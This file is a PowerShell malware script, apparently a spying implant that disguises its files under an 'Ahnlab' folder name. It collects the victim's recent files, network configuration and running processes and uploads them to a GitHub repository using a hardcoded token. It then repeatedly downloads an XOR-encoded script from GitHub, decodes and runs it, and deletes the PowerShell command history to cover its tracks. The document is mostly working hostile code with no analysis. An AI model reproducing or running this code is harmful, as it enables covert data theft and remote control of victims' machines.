$gjqjrudfh = "https://raw.githubusercontent.com/jinakims/dev/main/"
$dkdlel = "gi"
$lognmfl = "Ahnlab.hwp"
$fhrmvkdlf = "\Ahnlab\"
function stun($e)
{	
	$k = [byte[]](0,2,4,3,3,6,4,5,7,6,7,0,5,5,4,3,5,4,3,7,0,7,6,2,6,2,4,6,7,2,4,7,5,5,7,0,7,3,3,3,7,3,3,1,4,2,3,7,0,2,7,7,3,5,1,0,1,4,0,5,0,0,0,0,7,5,1,4,5,4,2,0,6,1,4,7,5,0,1,0,3,0,3,1,3,5,1,2,5,0,1,7,1,4,6,0,2,3,3,4,2,5,2,5,4,5,7,3,1,0,1,6,4,1,1,2,1,4,1,5,4,2,7,4,5,1,6,4,6,3,6,4,5,0,3,6,4,0,1,6,3,3,5,7,0,5,7,7,2,5,2,7,7,4,7,5,5,0,5,6) 
	$l = $e.Length
	$j = 0
	$i = 0
	$c = ""
	while($i -lt $l)
	{
		$j = $j % 160
		
		$a = $e[$i] -bxor $k[$j]
		$d = [char]$a
		$c += $d
		$j++
		$i++
	}

	return $c
}

function git-getfile {
    param (
        $token,
        $owner,
        $repo,
        $path
    )

    $base64token = [System.Convert]::ToBase64String([char[]]$token)

    $headers = @{
        Authorization = 'Basic {0}' -f $base64token
        accept = 'application/vnd.github.v3+json'
    }

    Invoke-RestMethod -Headers $headers -Uri https://api.github.com/repos/$owner/$repo/contents/$path -Method Get | select *, @{n='content_decoded';e={[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($_.content))}}
}

function git-uploadfile {
    param (
        $token,
        $message = '',
        $file,
        $owner,
        $repo,
        $path = '.\',
        $sha,
        [switch]$force
    )

    $path = (Join-Path $path (Split-Path $file -Leaf))

    $base64token = [System.Convert]::ToBase64String([char[]]$token)

    $headers = @{
        Authorization = 'Basic {0}' -f $base64token
    }

    if ($force -and !$sha) {
        $sha = $(
            try {
                (git-getfile -token $token -owner $owner -repo $repo -path $path).sha
            } catch {
                $null
            }
        )
    }

    $body = @{
        message = $message
        content = [convert]::ToBase64String((Get-Content $file -Encoding Byte))
        sha = $sha
    } | ConvertTo-Json

    Invoke-RestMethod -Headers $headers -Uri https://api.github.com/repos/$owner/$repo/contents/$path -Body $body -Method Put
}

function df
{
	$dwnnAmE = $dkdlel + ".md"

	$downpsurl = $gjqjrudfh + $dwnnAmE
	$codestring = (New-Object System.Net.WebClient).DownloadString($downpsurl)
	$comletter = stun $codestring
	
	$decode = $executioncontext.InvokeCommand.NewScriptBlock($comletter)
	$RunningJob = Get-Job -State Running
	if($RunningJob.count -lt 3)
	{
		$JobName = $RunningJob.count + 1
		Start-Job -ScriptBlock $decode -Name $JobName
	}
	else
	{
		$JobName = $RunningJob.count
		Stop-Job -Name $RunningJob.Name
		Remove-Job -Name $RunningJob.Name
		Start-Job -ScriptBlock $decode -Name $JobName
	}
}

function sssrehbs
{
	Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force
	$fph = $env:APPDATA + $fhrmvkdlf
	New-Item -Path $fph -Type directory -Force
	$hFLgPth = $fph + $lognmfl

	$edss = Get-ChildItem ([Environment]::GetFolderPath("Recent"))
	$sdbsdb = ipconfig /all
	$edss >> $hFLgPth
	$sdbsdb >> $hFLgPth
	Get-process >> $hFLgPth
	
	git-uploadfile -token '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' -file $hFLgPth -owner jinakims -repo tool -path test -force

	while ($true)
	{		
		df
		Start-Sleep -s 2
		$logp = $env:appdata + "\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
		$fffd = Test-Path $logp
		if($fffd -eq $True)
		{
			Remove-Item -path $logp -Recurse
		}
		Start-Sleep -s 1800
	}
	
}
sssrehbs

